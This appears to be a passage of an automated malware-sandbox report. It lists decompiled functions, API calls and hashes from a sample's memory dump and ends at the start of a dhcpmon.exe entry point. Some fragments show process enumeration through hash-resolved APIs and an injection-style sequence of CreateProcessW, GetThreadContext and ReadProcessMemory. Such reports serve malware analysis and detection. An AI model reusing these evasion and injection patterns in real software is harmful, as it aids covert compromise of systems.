Instruction Fuzzy Hash: 7C9158B0D04288EEFF02CBE4CC0ABDDBFB5AF15385F114055E640BA192DBB61A15CB29

Uniqueness

Uniqueness Score: -1.00%

Function 733516DB, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E733516DB(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void _v36;
				char _v88;
				struct HINSTANCE__* _t37;
				intOrPtr _t42;
				void* _t48;
				void* _t49;
				void* _t50;
				void* _t54;
				intOrPtr _t57;
				signed int _t61;
				signed int _t63;
				void* _t67;
				void* _t68;
				void* _t72;
				void* _t76;

				_t76 = __esi;
				_t68 = __edi;
				_t67 = __edx;
				 *0x7335405c = _a8;
				 *0x73354060 = _a16;
				 *0x73354064 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x73354038, E73351556);
				_push(1); // executed
				_t37 = E73351A98(); // executed
				_t54 = _t37;
				if(_t54 == 0) {
					L28:
					return _t37;
				} else {
					if( *((intOrPtr*)(_t54 + 4)) != 1) {
						E733522AF(_t54);
					}
					E733522F1(_t67, _t54);
					_t57 =  *((intOrPtr*)(_t54 + 4));
					if(_t57 == 0xffffffff) {
						L14:
						if(( *(_t54 + 0x810) & 0x00000004) == 0) {
							if( *((intOrPtr*)(_t54 + 4)) == 0) {
								_t37 = E733524D8(_t54);
							} else {
								_push(_t76);
								_push(_t68);
								_t61 = 8;
								_t13 = _t54 + 0x818; // 0x818
								memcpy( &_v36, _t13, _t61 << 2);
								_t42 = E7335156B(_t54,  &_v88);
								 *(_t54 + 0x834) =  *(_t54 + 0x834) & 0x00000000;
								_t18 = _t54 + 0x818; // 0x818
								_t72 = _t18;
								 *((intOrPtr*)(_t54 + 0x820)) = _t42;
								 *_t72 = 3;
								E733524D8(_t54);
								_t63 = 8;
								_t37 = memcpy(_t72,  &_v36, _t63 << 2);
							}
						} else {
							E733524D8(_t54);
							_t37 = GlobalFree(E73351266(E73351559(_t54)));
						}
						if( *((intOrPtr*)(_t54 + 4)) != 1) {
							_t37 = E7335249E(_t54);
							if(( *(_t54 + 0x810) & 0x00000040) != 0 &&  *_t54 == 1) {
								_t37 =  *(_t54 + 0x808);
								if(_t37 != 0) {
									_t37 = FreeLibrary(_t37);
								}
							}
							if(( *(_t54 + 0x810) & 0x00000020) != 0) {
								_t37 = E733514E2( *0x73354058);
							}
						}
						if(( *(_t54 + 0x810) & 0x00000002) != 0) {
							goto L28;
						} else {
							return GlobalFree(_t54);
						}
					}
					_t48 =  *_t54;
					if(_t48 == 0) {
						if(_t57 != 1) {
							goto L14;
						}
						E73352CC3(_t54);
						L12:
						_t54 = _t48;
						L13:
						goto L14;
					}
					_t49 = _t48 - 1;
					if(_t49 == 0) {
						L8:
						_t48 = E73352A38(_t57, _t54); // executed
						goto L12;
					}
					_t50 = _t49 - 1;
					if(_t50 == 0) {
						E733526B2(_t54);
						goto L13;
					}
					if(_t50 != 1) {
						goto L14;
					}
					goto L8;
				}
			}

0x733516db
0x733516db
0x733516db
0x733516e5
0x733516ed
0x733516fa
0x73351708
0x7335170b
0x7335170d
0x73351712
0x73351717
0x73351836
0x73351836
0x7335171d
0x73351721
0x73351724
0x73351729
0x7335172b
0x73351731
0x73351737
0x73351767
0x7335176e
0x73351792
0x733517dd
0x73351794
0x73351794
0x73351795
0x7335179b
0x7335179c
0x733517a6
0x733517a9
0x733517ae
0x733517b5
0x733517b5
0x733517bc
0x733517c2
0x733517c8
0x733517d5
0x733517d6
0x733517d9
0x73351770
0x73351771
0x73351786
0x73351786
0x733517e7
0x733517ea
0x733517f7
0x733517fe
0x73351806
0x73351809
0x73351809
0x73351806
0x73351816
0x7335181e
0x73351823
0x73351816
0x7335182b
0x00000000
0x7335182d
0x00000000
0x7335182e
0x7335182b
0x7335173b
0x7335173e
0x7335175c
0x00000000
0x00000000
0x7335175f
0x73351764
0x73351764
0x73351766
0x00000000
0x73351766
0x73351740
0x73351741
0x73351749
0x7335174a
0x00000000
0x7335174a
0x73351743
0x73351744
0x73351752
0x00000000
0x73351752
0x73351747
0x00000000
0x00000000
0x00000000
0x73351747

APIs

Part of subcall function 73351A98: GlobalFree.KERNEL32 ref: 73351D09
Part of subcall function 73351A98: GlobalFree.KERNEL32 ref: 73351D0E
Part of subcall function 73351A98: GlobalFree.KERNEL32 ref: 73351D13

GlobalFree.KERNEL32 ref: 73351786
FreeLibrary.KERNEL32(?), ref: 73351809
GlobalFree.KERNEL32 ref: 7335182E

Part of subcall function 733522AF: GlobalAlloc.KERNEL32(00000040,?), ref: 733522E0

Part of subcall function 733526B2: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,73351757,00000000), ref: 73352782

Part of subcall function 7335156B: wsprintfA.USER32 ref: 73351599

Strings

, xrefs: 7335180F

Memory Dump Source

Source File: 00000009.00000002.270495785.0000000073351000.00000020.00020000.sdmp, Offset: 73350000, based on PE: true

Associated: 00000009.00000002.270489484.0000000073350000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.270502205.0000000073353000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.270512499.0000000073355000.00000002.00020000.sdmp Download File

Similarity

API ID: Global$Free$Alloc$Librarywsprintf
String ID:
API String ID: 3962662361-3916222277
Opcode ID: 935b113ccb8116d0d8da1c282c3e2f84c12d260cf56d858cd4b118a7dd8e2c9d
Instruction ID: 2f214a54ac8d9ec7634ef1b3401e8d6c397dc9b6ea9ea623fed00230b5c02a51
Opcode Fuzzy Hash: 935b113ccb8116d0d8da1c282c3e2f84c12d260cf56d858cd4b118a7dd8e2c9d
Instruction Fuzzy Hash: E24160B2D003089BDF31AF78CD84F9677ACBB04215F188465F94B9A1C6DB788586CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 10003034, Relevance: 6.5, APIs: 4, Instructions: 543processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(?,00000000), ref: 10003355
GetThreadContext.KERNEL32(?,00010007), ref: 10003378
ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 1000339C

Memory Dump Source

Source File: 00000009.00000002.270473690.0000000010003000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.270448534.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.270459599.0000000010001000.00000020.00020000.sdmp Download File
Associated: 00000009.00000002.270466698.0000000010002000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.270479747.0000000010005000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$ContextCreateMemoryReadThread
String ID:
API String ID: 2411489757-0
Opcode ID: 9cdcb5365ca6d10b687a1723467ffaa9184928f47fd203e115eddf9ce7210df9
Instruction ID: 39085faca70daa19f6f8bcd55ab0bc5da3e418fa0953938c9b3c92a76162beb1
Opcode Fuzzy Hash: 9cdcb5365ca6d10b687a1723467ffaa9184928f47fd203e115eddf9ce7210df9
Instruction Fuzzy Hash: 65222875E40208EEEB61CBA4DC45BAEB7B9FF04745F20809AE605FA2A0D7715E80DF15

Uniqueness

Uniqueness Score: -1.00%

Function 100041FD, Relevance: 3.1, APIs: 2, Instructions: 52
processCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E100041FD(void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				void* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v544;
				char _v580;
				struct tagPROCESSENTRY32W* _t25;

				_v8 = E10004564();
				_v16 = E1000460C(_v8, 0xea31d3b6);
				_v20 = E1000460C(_v8, 0x5c7bf6e9);
				_v24 = E1000460C(_v8, 0x873d1860);
				_v12 = CreateToolhelp32Snapshot(2, 0);
				if(_v12 != 0xffffffff) {
					_v580 = 0x22c;
					_t25 =  &_v580;
					Process32FirstW(_v12, _t25);
					if(_t25 != 0) {
						while(E100041B9( &_v544) != _a4) {
							_push( &_v580);
							_push(_v12);
							if(_v24() != 0) {
								continue;
							}
							return 0;
						}
						return 1;
					}
					return 0;
				}
				return 0;
			}

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,873D1860,?,5C7BF6E9,?,EA31D3B6), ref: 10004242
Process32FirstW.KERNEL32(000000FF,0000022C), ref: 10004266

Memory Dump Source

Source File: 00000009.00000002.270473690.0000000010003000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.270448534.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.270459599.0000000010001000.00000020.00020000.sdmp Download File
Associated: 00000009.00000002.270466698.0000000010002000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.270479747.0000000010005000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateFirstProcess32SnapshotToolhelp32
String ID:
API String ID: 2353314856-0
Opcode ID: 4fec2c12de2fa19a68e7ad0317d70262ee43ba40948bb73445af5165cff89eff
Instruction ID: 404db1fc38640611994a30d65a515dec8e00ceeec5689e89a360ff1643e68d53
Opcode Fuzzy Hash: 4fec2c12de2fa19a68e7ad0317d70262ee43ba40948bb73445af5165cff89eff
Instruction Fuzzy Hash: 93112AB4E00249FFEB10DFB0CC49AAEBBB8EF04380F5245A5F914E1154EB315E509B59

Uniqueness

Uniqueness Score: -1.00%

Function 73352921, Relevance: 1.5, APIs: 1, Instructions: 21
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(intOrPtr _a4, intOrPtr _a8) {

				 *0x73354038 = _a4;
				if(_a8 == 1) {
					VirtualProtect(0x7335404c, 4, 0x40, 0x7335403c); // executed
					 *0x7335404c = 0xc2;
					 *0x7335403c = 0;
					 *0x73354044 = 0;
					 *0x73354058 = 0;
					 *0x73354048 = 0;
					 *0x73354040 = 0;
					 *0x73354050 = 0;
					 *0x7335404e = 0;
				}
				return 1;
			}

0x7335292a
0x7335292f
0x7335293f
0x73352947
0x7335294e
0x73352953
0x73352958
0x7335295d
0x73352962
0x73352967
0x7335296c
0x7335296c
0x73352974

APIs

VirtualProtect.KERNEL32(7335404C,00000004,00000040,7335403C), ref: 7335293F

Memory Dump Source

Source File: 00000009.00000002.270495785.0000000073351000.00000020.00020000.sdmp, Offset: 73350000, based on PE: true

Associated: 00000009.00000002.270489484.0000000073350000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.270502205.0000000073353000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.270512499.0000000073355000.00000002.00020000.sdmp Download File

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 6a13506407cf5c534f9a4a020d04387443033036752a4eae4b2df365f2cf6fee
Instruction ID: 19dc5235eb5cde07877bda3d5a82fe4d32e44af119e10951f68b2baed9736484
Opcode Fuzzy Hash: 6a13506407cf5c534f9a4a020d04387443033036752a4eae4b2df365f2cf6fee
Instruction Fuzzy Hash: 4CF092B35083A0DEE378EF7AA844B06BEF8B319264B31452AE59DD7241E33C40448B11

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 733524D8, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 124
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E733524D8(intOrPtr* _a4) {
				char _v80;
				int _v84;
				intOrPtr _v88;
				short _v92;
				intOrPtr* _t28;
				void* _t30;
				intOrPtr _t31;
				signed int _t43;
				void* _t44;
				intOrPtr _t45;
				void* _t48;

				_t44 = E73351215();
				_t28 = _a4;
				_t45 =  *((intOrPtr*)(_t28 + 0x814));
				_v88 = _t45;
				_t48 = (_t45 + 0x41 << 5) + _t28;
				do {
					if( *((intOrPtr*)(_t48 - 4)) >= 0) {
					}
					_t43 =  *(_t48 - 8) & 0x000000ff;
					if(_t43 <= 7) {
						switch( *((intOrPtr*)(_t43 * 4 +  &M73352626))) {
							case 0:
								 *_t44 = 0;
								goto L17;
							case 1:
								__eax =  *__eax;
								if(__ecx > __ebx) {
									_v84 = __ecx;
									__ecx =  *(0x7335307c + __edx * 4);
									__edx = _v84;
									__ecx = __ecx * __edx;
									asm("sbb edx, edx");
									__edx = __edx & __ecx;
									__eax = __eax &  *(0x7335309c + __edx * 4);
								}
								_push(__eax);
								goto L15;
							case 2:
								__eax = E73351429(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
								goto L16;
							case 3:
								__eax = lstrcpynA(__edi,  *__eax,  *0x7335405c);
								goto L17;
							case 4:
								__ecx =  *0x7335405c;
								__edx = __ecx - 1;
								__eax = WideCharToMultiByte(__ebx, __ebx,  *__eax, __ecx, __edi, __edx, __ebx, __ebx);
								__eax =  *0x7335405c;
								 *((char*)(__eax + __edi - 1)) = __bl;
								goto L17;
							case 5:
								__ecx =  &_v80;
								_push(0x27);
								_push(__ecx);
								_push( *__eax);
								" {<u@u<u"();
								__eax =  &_v92;
								__eax = WideCharToMultiByte(__ebx, __ebx,  &_v92,  &_v92, __edi,  *0x7335405c, __ebx, __ebx);
								goto L17;
							case 6:
								_push( *__esi);
								L15:
								__eax = wsprintfA(__edi, 0x73354000);
								L16:
								__esp = __esp + 0xc;
								goto L17;
						}
					}
					L17:
					_t30 =  *(_t48 + 0x14);
					if(_t30 != 0 && ( *_a4 != 2 ||  *((intOrPtr*)(_t48 - 4)) > 0)) {
						GlobalFree(_t30);
					}
					_t31 =  *((intOrPtr*)(_t48 + 0xc));
					if(_t31 != 0) {
						if(_t31 != 0xffffffff) {
							if(_t31 > 0) {
								E733512D1(_t31 - 1, _t44);
								goto L26;
							}
						} else {
							E73351266(_t44);
							L26:
						}
					}
					_v88 = _v88 - 1;
					_t48 = _t48 - 0x20;
				} while (_v88 >= 0);
				return GlobalFree(_t44);
			}

0x733524e4
0x733524e6
0x733524f0
0x733524f6
0x73352500
0x73352504
0x73352509
0x73352509
0x73352511
0x73352518
0x7335251e
0x00000000
0x73352525
0x00000000
0x00000000
0x7335252c
0x73352530
0x73352533
0x73352537
0x7335253e
0x73352542
0x73352548
0x7335254a
0x7335254c
0x7335254c
0x73352553
0x00000000
0x00000000
0x7335255c
0x00000000
0x00000000
0x7335256c
0x00000000
0x00000000
0x73352598
0x733525a0
0x733525aa
0x733525ac
0x733525b1
0x00000000
0x00000000
0x73352574
0x73352578
0x7335257a
0x7335257b
0x7335257d
0x7335258d
0x73352594
0x00000000
0x00000000
0x733525b7
0x733525b9
0x733525bf
0x733525c5
0x733525c5
0x00000000
0x00000000
0x7335251e
0x733525c8
0x733525c8
0x733525cd
0x733525de
0x733525de
0x733525e4
0x733525e9
0x733525ee
0x733525fa
0x733525ff
0x00000000
0x73352604
0x733525f0
0x733525f1
0x73352605
0x73352605
0x733525ee
0x73352606
0x7335260a
0x7335260d
0x73352625

APIs

Part of subcall function 73351215: GlobalAlloc.KERNEL32(00000040,73351233,?,733512CF,-7335404B,733511AB,-000000A0), ref: 7335121D

GlobalFree.KERNEL32 ref: 733525DE
GlobalFree.KERNEL32 ref: 73352618

Strings

{<u@u<u, xrefs: 7335257D

Memory Dump Source

Source File: 00000009.00000002.270495785.0000000073351000.00000020.00020000.sdmp, Offset: 73350000, based on PE: true

Associated: 00000009.00000002.270489484.0000000073350000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.270502205.0000000073353000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.270512499.0000000073355000.00000002.00020000.sdmp Download File

Similarity

API ID: Global$Free$Alloc
String ID: {<u@u<u
API String ID: 1780285237-2852364109
Opcode ID: 6daf19f9d30f785884772bf08612e586e4f534ca3eeb73aa43508d160f0cf92b
Instruction ID: d03d0963763f89fc866be3e6fc07e9a113e0248c8d97f69c6788d87e61957e33
Opcode Fuzzy Hash: 6daf19f9d30f785884772bf08612e586e4f534ca3eeb73aa43508d160f0cf92b
Instruction Fuzzy Hash: B041EF73504208EFE7369F75CC94F2AB7BEEB85210B24492DF546D3140DB399908CB61

Uniqueness

Uniqueness Score: -1.00%

Function 73351837, Relevance: 7.7, APIs: 5, Instructions: 194
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E73351837(signed int __edx, void* __eflags, void* _a8, void* _a16) {
				void* _v8;
				signed int _v12;
				signed int _v20;
				signed int _v24;
				char _v52;
				void _t45;
				void _t46;
				signed int _t47;
				signed int _t48;
				signed int _t57;
				signed int _t58;
				signed int _t59;
				signed int _t60;
				signed int _t61;
				void* _t67;
				void* _t68;
				void* _t69;
				void* _t70;
				void* _t71;
				signed int _t77;
				void* _t81;
				signed int _t83;
				signed int _t85;
				signed int _t87;
				signed int _t90;
				void* _t101;

				_t85 = __edx;
				 *0x7335405c = _a8;
				_t77 = 0;
				 *0x73354060 = _a16;
				_v12 = 0;
				_v8 = E7335123B();
				_t90 = E733512FE(_t42);
				_t87 = _t85;
				_t81 = E7335123B();
				_a8 = _t81;
				_t45 =  *_t81;
				if(_t45 != 0x7e && _t45 != 0x21) {
					_a16 = E7335123B();
					_t77 = E733512FE(_t74);
					_v12 = _t85;
					GlobalFree(_a16);
					_t81 = _a8;
				}
				_t46 =  *_t81;
				_t101 = _t46 - 0x2f;
				if(_t101 > 0) {
					_t47 = _t46 - 0x3c;
					__eflags = _t47;
					if(_t47 == 0) {
						__eflags =  *((char*)(_t81 + 1)) - 0x3c;
						if( *((char*)(_t81 + 1)) != 0x3c) {
							__eflags = _t87 - _v12;
							if(__eflags > 0) {
								L56:
								_t48 = 0;
								__eflags = 0;
								L57:
								asm("cdq");
								L58:
								_t90 = _t48;
								_t87 = _t85;
								L59:
								E73351429(_t85, _t90, _t87,  &_v52);
								E73351266( &_v52);
								GlobalFree(_v8);
								return GlobalFree(_a8);
							}
							if(__eflags < 0) {
								L49:
								__eflags = 0;
								L50:
								_t48 = 1;
								goto L57;
							}
							__eflags = _t90 - _t77;
							if(_t90 < _t77) {
								goto L49;
							}
							goto L56;
						}
						_t85 = _t87;
						_t48 = E73352EF0(_t90, _t77, _t85);
						goto L58;
					}
					_t57 = _t47 - 1;
					__eflags = _t57;
					if(_t57 == 0) {
						__eflags = _t90 - _t77;
						if(_t90 != _t77) {
							goto L56;
						}
						__eflags = _t87 - _v12;
						if(_t87 != _v12) {
							goto L56;
						}
						goto L49;
					}
					_t58 = _t57 - 1;
					__eflags = _t58;
					if(_t58 == 0) {
						__eflags =  *((char*)(_t81 + 1)) - 0x3e;
						if( *((char*)(_t81 + 1)) != 0x3e) {
							__eflags = _t87 - _v12;
							if(__eflags < 0) {
								goto L56;
							}
							if(__eflags > 0) {
								goto L49;
							}
							__eflags = _t90 - _t77;
							if(_t90 <= _t77) {
								goto L56;
							}
							goto L49;
						}
						__eflags =  *((char*)(_t81 + 2)) - 0x3e;
						_t85 = _t87;
						_t59 = _t90;
						_t83 = _t77;
						if( *((char*)(_t81 + 2)) != 0x3e) {
							_t48 = E73352F10(_t59, _t83, _t85);
						} else {
							_t48 = E73352F40(_t59, _t83, _t85);
						}
						goto L58;
					}
					_t60 = _t58 - 0x20;
					__eflags = _t60;
					if(_t60 == 0) {
						_t90 = _t90 ^ _t77;
						_t87 = _t87 ^ _v12;
						goto L59;
					}
					_t61 = _t60 - 0x1e;
					__eflags = _t61;
					if(_t61 == 0) {
						__eflags =  *((char*)(_t81 + 1)) - 0x7c;
						if( *((char*)(_t81 + 1)) != 0x7c) {
							_t90 = _t90 | _t77;
							_t87 = _t87 | _v12;
							goto L59;
						}
						__eflags = _t90 | _t87;
						if((_t90 | _t87) != 0) {
							goto L49;
						}
						__eflags = _t77 | _v12;
						if((_t77 | _v12) != 0) {
							goto L49;
						}
						goto L56;
					}
					__eflags = _t61 == 0;
					if(_t61 == 0) {
						_t90 =  !_t90;
						_t87 =  !_t87;
					}
					goto L59;
				}
				if(_t101 == 0) {
					L21:
					__eflags = _t77 | _v12;
					if((_t77 | _v12) != 0) {
						_v24 = E73352D80(_t90, _t87, _t77, _v12);
						_v20 = _t85;
						_t48 = E73352E30(_t90, _t87, _t77, _v12);
						_t81 = _a8;
					} else {
						_v24 = _v24 & 0x00000000;
						_v20 = _v20 & 0x00000000;
						_t48 = _t90;
						_t85 = _t87;
					}
					__eflags =  *_t81 - 0x2f;
					if( *_t81 != 0x2f) {
						goto L58;
					} else {
						_t90 = _v24;
						_t87 = _v20;
						goto L59;
					}
				}
				_t67 = _t46 - 0x21;
				if(_t67 == 0) {
					_t48 = 0;
					__eflags = _t90 | _t87;
					if((_t90 | _t87) != 0) {
						goto L57;
					}
					goto L50;
				}
				_t68 = _t67 - 4;
				if(_t68 == 0) {
					goto L21;
				}
				_t69 = _t68 - 1;
				if(_t69 == 0) {
					__eflags =  *((char*)(_t81 + 1)) - 0x26;
					if( *((char*)(_t81 + 1)) != 0x26) {
						_t90 = _t90 & _t77;
						_t87 = _t87 & _v12;
						goto L59;
					}
					__eflags = _t90 | _t87;
					if((_t90 | _t87) == 0) {
						goto L56;
					}
					__eflags = _t77 | _v12;
					if((_t77 | _v12) == 0) {
						goto L56;
					}
					goto L49;
				}
				_t70 = _t69 - 4;
				if(_t70 == 0) {
					_t48 = E73352D40(_t90, _t87, _t77, _v12);
					goto L58;
				} else {
					_t71 = _t70 - 1;
					if(_t71 == 0) {
						_t90 = _t90 + _t77;
						asm("adc edi, [ebp-0x8]");
					} else {
						if(_t71 == 0) {
							_t90 = _t90 - _t77;
							asm("sbb edi, [ebp-0x8]");
						}
					}
					goto L59;
				}
			}

0x73351837
0x73351841
0x7335184a
0x7335184d
0x73351852
0x7335185b
0x73351864
0x73351866
0x7335186d
0x7335186f
0x73351872
0x73351876
0x73351882
0x7335188b
0x73351890
0x73351893
0x73351899
0x73351899
0x7335189c
0x7335189f
0x733518a2
0x73351968
0x73351968
0x7335196b
0x733519e5
0x733519e9
0x733519f8
0x733519fb
0x73351a03
0x73351a03
0x73351a03
0x73351a05
0x73351a05
0x73351a06
0x73351a06
0x73351a08
0x73351a0a
0x73351a10
0x73351a19
0x73351a2a
0x73351a35
0x73351a35
0x733519fd
0x733519e0
0x733519e0
0x733519e2
0x733519e2
0x00000000
0x733519e2
0x733519ff
0x73351a01
0x00000000
0x00000000
0x00000000
0x73351a01
0x733519ed
0x733519f1
0x00000000
0x733519f1
0x7335196d
0x7335196d
0x7335196e
0x733519d7
0x733519d9
0x00000000
0x00000000
0x733519db
0x733519de
0x00000000
0x00000000
0x00000000
0x733519de
0x73351970
0x73351970
0x73351971
0x733519aa
0x733519ae
0x733519ca
0x733519cd
0x00000000
0x00000000
0x733519cf
0x00000000
0x00000000
0x733519d1
0x733519d3
0x00000000
0x00000000
0x00000000
0x733519d5
0x733519b0
0x733519b4
0x733519b6
0x733519b8
0x733519ba
0x733519c3
0x733519bc
0x733519bc
0x733519bc
0x00000000
0x733519ba
0x73351973
0x73351973
0x73351976
0x733519a3
0x733519a5
0x00000000
0x733519a5
0x73351978
0x73351978
0x7335197b
0x7335198b
0x7335198f
0x7335199c
0x7335199e
0x00000000
0x7335199e
0x73351991
0x73351993
0x00000000
0x00000000
0x73351995
0x73351998
0x00000000
0x00000000
0x00000000
0x7335199a
0x7335197e
0x7335197f
0x73351985
0x73351987
0x73351987
0x00000000
0x7335197f
0x733518a8
0x73351920
0x73351922
0x73351925
0x73351943
0x73351946
0x7335194c
0x73351951
0x73351927
0x73351927
0x7335192b
0x7335192f
0x73351931
0x73351931
0x73351954
0x73351957
0x00000000
0x7335195d
0x7335195d
0x73351960
0x00000000
0x73351960
0x73351957
0x733518aa
0x733518ad
0x73351911
0x73351913
0x73351915
0x00000000
0x00000000
0x00000000
0x7335191b
0x733518af
0x733518b2
0x00000000
0x00000000
0x733518b4
0x733518b5
0x733518eb
0x733518ef
0x73351907
0x73351909
0x00000000
0x73351909
0x733518f1
0x733518f3
0x00000000
0x00000000
0x733518f9
0x733518fc
0x00000000
0x00000000
0x00000000
0x73351902
0x733518b7
0x733518ba
0x733518e1
0x00000000
0x733518bc
0x733518bc
0x733518bd
0x733518d1
0x733518d3
0x733518bf
0x733518c1
0x733518c7
0x733518c9
0x733518c9
0x733518c1
0x00000000
0x733518bd

APIs

GlobalFree.KERNEL32 ref: 73351893
GlobalFree.KERNEL32 ref: 73351A2A
GlobalFree.KERNEL32 ref: 73351A2F

Memory Dump Source

Source File: 00000009.00000002.270495785.0000000073351000.00000020.00020000.sdmp, Offset: 73350000, based on PE: true

Associated: 00000009.00000002.270489484.0000000073350000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.270502205.0000000073353000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.270512499.0000000073355000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeGlobal
String ID:
API String ID: 2979337801-0
Opcode ID: 2b7a530e9633f4f8fb457340d76de35139c4e06d3b804e9a8c383d90cf7a9c3c
Instruction ID: 18d41b9ee573e5ad5edd8f907def6b4a76f33779b8336055e27d134d17ba6d3b
Opcode Fuzzy Hash: 2b7a530e9633f4f8fb457340d76de35139c4e06d3b804e9a8c383d90cf7a9c3c
Instruction Fuzzy Hash: 9551B072D04198AFEF339BB4CC44FAEBABEAB44255F18015AF407E3184C73599428791

Uniqueness

Uniqueness Score: -1.00%

Function 733510E0, Relevance: 5.1, APIs: 4, Instructions: 102
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E733510E0(void* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				char* _t17;
				char _t19;
				void* _t20;
				void* _t24;
				void* _t27;
				void* _t31;
				void* _t37;
				void* _t39;
				void* _t40;
				signed int _t43;
				void* _t52;
				char* _t53;
				char* _t55;
				void* _t56;
				void* _t58;

				 *0x7335405c = _a8;
				 *0x73354060 = _a16;
				 *0x73354064 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x73354038, E73351556, _t52);
				_t43 =  *0x7335405c +  *0x7335405c * 4 << 2;
				_t17 = E7335123B();
				_a8 = _t17;
				_t53 = _t17;
				if( *_t17 == 0) {
					L16:
					return GlobalFree(_a8);
				} else {
					do {
						_t19 =  *_t53;
						_t55 = _t53 + 1;
						_t58 = _t19 - 0x6c;
						if(_t58 > 0) {
							_t20 = _t19 - 0x70;
							if(_t20 == 0) {
								L12:
								_t53 = _t55 + 1;
								_t24 = E73351266(E733512AD( *_t55 - 0x30));
								L13:
								GlobalFree(_t24);
								goto L14;
							}
							_t27 = _t20;
							if(_t27 == 0) {
								L10:
								_t53 = _t55 + 1;
								_t24 = E733512D1( *_t55 - 0x30, E7335123B());
								goto L13;
							}
							L7:
							if(_t27 == 1) {
								_t31 = GlobalAlloc(0x40, _t43 + 4);
								 *_t31 =  *0x73354030;
								 *0x73354030 = _t31;
								E73351508(_t31 + 4,  *0x73354064, _t43);
								_t56 = _t56 + 0xc;
							}
							goto L14;
						}
						if(_t58 == 0) {
							L17:
							_t34 =  *0x73354030;
							if( *0x73354030 != 0) {
								E73351508( *0x73354064, _t34 + 4, _t43);
								_t37 =  *0x73354030;
								_t56 = _t56 + 0xc;
								GlobalFree(_t37);
								 *0x73354030 =  *_t37;
							}
							goto L14;
						}
						_t39 = _t19 - 0x4c;
						if(_t39 == 0) {
							goto L17;
						}
						_t40 = _t39 - 4;
						if(_t40 == 0) {
							 *_t55 =  *_t55 + 0xa;
							goto L12;
						}
						_t27 = _t40;
						if(_t27 == 0) {
							 *_t55 =  *_t55 + 0xa;
							goto L10;
						}
						goto L7;
						L14:
					} while ( *_t53 != 0);
					goto L16;
				}
			}

0x733510e7
0x733510ef
0x73351103
0x7335110b
0x73351116
0x73351119
0x73351121
0x73351124
0x73351126
0x733511c4
0x733511d0
0x7335112c
0x7335112d
0x7335112d
0x73351130
0x73351131
0x73351134
0x73351203
0x73351206
0x7335119e
0x733511a4
0x733511ac
0x733511b1
0x733511b4
0x00000000
0x733511b4
0x73351209
0x7335120a
0x73351186
0x7335118c
0x73351194
0x00000000
0x73351194
0x73351152
0x73351153
0x7335115b
0x73351168
0x73351170
0x73351179
0x7335117e
0x7335117e
0x00000000
0x73351153
0x7335113a
0x733511d1
0x733511d1
0x733511d8
0x733511e5
0x733511ea
0x733511ef
0x733511f5
0x733511fb
0x733511fb
0x00000000
0x733511d8
0x73351140
0x73351143
0x00000000
0x00000000
0x73351149
0x7335114c
0x7335119b
0x00000000
0x7335119b
0x7335114f
0x73351150
0x73351183
0x00000000
0x73351183
0x00000000
0x733511ba
0x733511ba
0x00000000
0x733511c3

APIs

GlobalAlloc.KERNEL32(00000040,?), ref: 7335115B
GlobalFree.KERNEL32 ref: 733511B4
GlobalFree.KERNEL32 ref: 733511C7
GlobalFree.KERNEL32 ref: 733511F5

Memory Dump Source

Source File: 00000009.00000002.270495785.0000000073351000.00000020.00020000.sdmp, Offset: 73350000, based on PE: true

Associated: 00000009.00000002.270489484.0000000073350000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.270502205.0000000073353000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.270512499.0000000073355000.00000002.00020000.sdmp Download File

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: ba75b2e18c01f59379a25a6fe9f24d55687618f16e3362a71a48079f8179ed79
Instruction ID: 6bd8e73103657a2ea867dd7f2689cfb1903e487ce4cccb8ed4bf726b1208e2cc
Opcode Fuzzy Hash: ba75b2e18c01f59379a25a6fe9f24d55687618f16e3362a71a48079f8179ed79
Instruction Fuzzy Hash: 02317CB3D04254AFEF31AF76D948F26BFBCEB05250B384555F84AC7250D6389901CB60

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: dhcpmon.exe PID: 5312 Parent PID: 904 dhcpmon.exeCOMMON

Executed Functions

Function 00403486, Relevance: 91.4, APIs: 32, Strings: 20, Instructions: 366
stringcomfileCOMMON

Download Yara Rule

C-Code - Quality: 86%

			_entry_() {
